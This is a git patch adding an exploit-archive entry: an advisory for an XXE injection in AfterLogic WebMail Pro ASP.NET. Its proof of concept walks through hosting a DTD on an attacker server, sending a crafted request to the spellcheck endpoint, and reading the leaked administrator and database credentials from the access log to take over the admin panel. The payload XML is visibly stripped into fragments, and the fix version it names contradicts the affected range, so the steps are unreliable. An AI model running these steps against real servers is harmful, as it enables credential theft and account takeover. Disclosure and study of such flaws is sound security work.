From b189e252663e654ec7177f86e9b37e15986510e1 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 25 May 2016 05:01:52 +0000 Subject: [PATCH] DB: 2016-05-25 1 new exploits AfterLogic WebMail Pro ASP.NET 6.2.6 - Administrator Account Disclosure via XXE Injection --- files.csv | 1 + platforms/asp/webapps/39850.txt | 123 ++++++++++++++++++++++++++++++++ 2 files changed, 124 insertions(+) create mode 100755 platforms/asp/webapps/39850.txt diff --git a/files.csv b/files.csv index 4a07f7ae4..c08944fc4 100755 --- a/files.csv +++ b/files.csv @@ -36034,3 +36034,4 @@ id,file,description,date,author,platform,type,port 39847,platforms/lin_x86-64/shellcode/39847.c,"Linux x86_64 Information Stealer Shellcode",2016-05-23,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0 39848,platforms/php/webapps/39848.py,"Job Script by Scubez - Remote Code Execution",2016-05-23,"Bikramaditya Guha",php,webapps,80 39849,platforms/php/webapps/39849.txt,"XenAPI 1.4.1 for XenForo - Multiple SQL Injections",2016-05-23,"Julien Ahrens",php,webapps,443 +39850,platforms/asp/webapps/39850.txt,"AfterLogic WebMail Pro ASP.NET 6.2.6 - Administrator Account Disclosure via XXE Injection",2016-05-24,"Mehmet Ince",asp,webapps,80 diff --git a/platforms/asp/webapps/39850.txt b/platforms/asp/webapps/39850.txt new file mode 100755 index 000000000..8e35722c8 --- /dev/null +++ b/platforms/asp/webapps/39850.txt @@ -0,0 +1,123 @@ +1. ADVISORY INFORMATION +======================================== +Title: AfterLogic WebMail Pro ASP.NET Administrator Account Takover via XXE +Injection +Application: AfterLogic WebMail Pro ASP.NET +Class: Sensitive Information disclosure +Remotely Exploitable: Yes +Versions Affected: AfterLogic WebMail Pro ASP.NET < 6.2.7 +Vendor URL: http://www.afterlogic.com/webmail-client-asp-net +Bugs: XXE Injection +Date of found: 28.03.2016 +Reported: 22.05.2016 +Vendor response: 22.05.2016 +Date of Public Advisory: 23.05.2016 +Author: Mehmet Ince + + +2. CREDIT +======================================== +This vulnerability was identified during penetration test +by Mehmet INCE & Halit Alptekin from PRODAFT / INVICTUS + + +3. VERSIONS AFFECTED +======================================== +AfterLogic WebMail Pro ASP.NET < 6.2.7 + + +4. INTRODUCTION +======================================== +It seems that /webmail/spellcheck.aspx?xml= endpoint takes XML request as +an parameter and parse it with XML entities. +By abusing XML entities attackers can read Web.config file as well as +settings.xml that contains administrator account +credentials in plain-text. + +5. TECHNICAL DETAILS & POC +======================================== + +1 - Put following XML entity definition into your attacker server. E.g: +/var/www/html/test.dtd. Do NOT forget to change ATTACKER_SERVER_IP. + + +"> + +2 - Start reading access log on your attacker server. + +tail -f /var/log/apache/access.log + +3 - Send following HTTP GET request to the target. + +http://TARGET_DOMAIN/webmail/spellcheck.aspx?xml= + +%remote; +%int; +%trick;]> + +4 - You will see the settings.xml content in your access log. +5 - In order to decode and see it in pretty format. Please follow +instruction in order. +5.1 - Create urldecode alias by executing following command. + +alias urldecode='python -c "import sys, urllib as ul; \ + print ul.unquote_plus(sys.argv[1])"' + +5.2 - Get last line of access log and pass it to the urldecode. + +root@hacker:/var/www/html# urldecode $(tail -n 1 +/var/log/apache2/access.log|awk {'print $7'}) +/?p= + + + [SITE_NAME_WILL_BE_HERE] + [LICENSE_KEY]/LicenseKey> + [ADMINISTRATOR_USERNAME] + [ADMINISTRATOR_PASSWORD] + MSSQL + WebMailUser + [DATABASE_PASSWORD] + Webmail + + + localhost\SQLEXPRESS + .... + .... + ... + +6 - You can login by using these administration credentials. +Login panel is located at http://TARGET_DOMAIN/webmail/adminpanel/ + + +6. RISK +======================================== +The vulnerability allows remote attackers to read sensitive information +from the server such as settings.xml or web.config which contains +administrator +account and database credentials. + +7. SOLUTION +======================================== +Update to the latest version v1.4.2 + +8. REPORT TIMELINE +======================================== +28.03.2016: Vulnerability discovered during pentest +29.03.2016: Our client requested a time to mitigate their infrastructures +22.05.2016: First contact with vendor +22.05.2016: Vendor requested more technical details. +23.05.2016: Vendor publishes update with 6.2.7 release. +23.05.2016: Advisory released + +9. REFERENCES +======================================== +https://twitter.com/afterlogic/status/734764320165400576 + + +-- +Sr. Information Security Engineer +https://www.mehmetince.net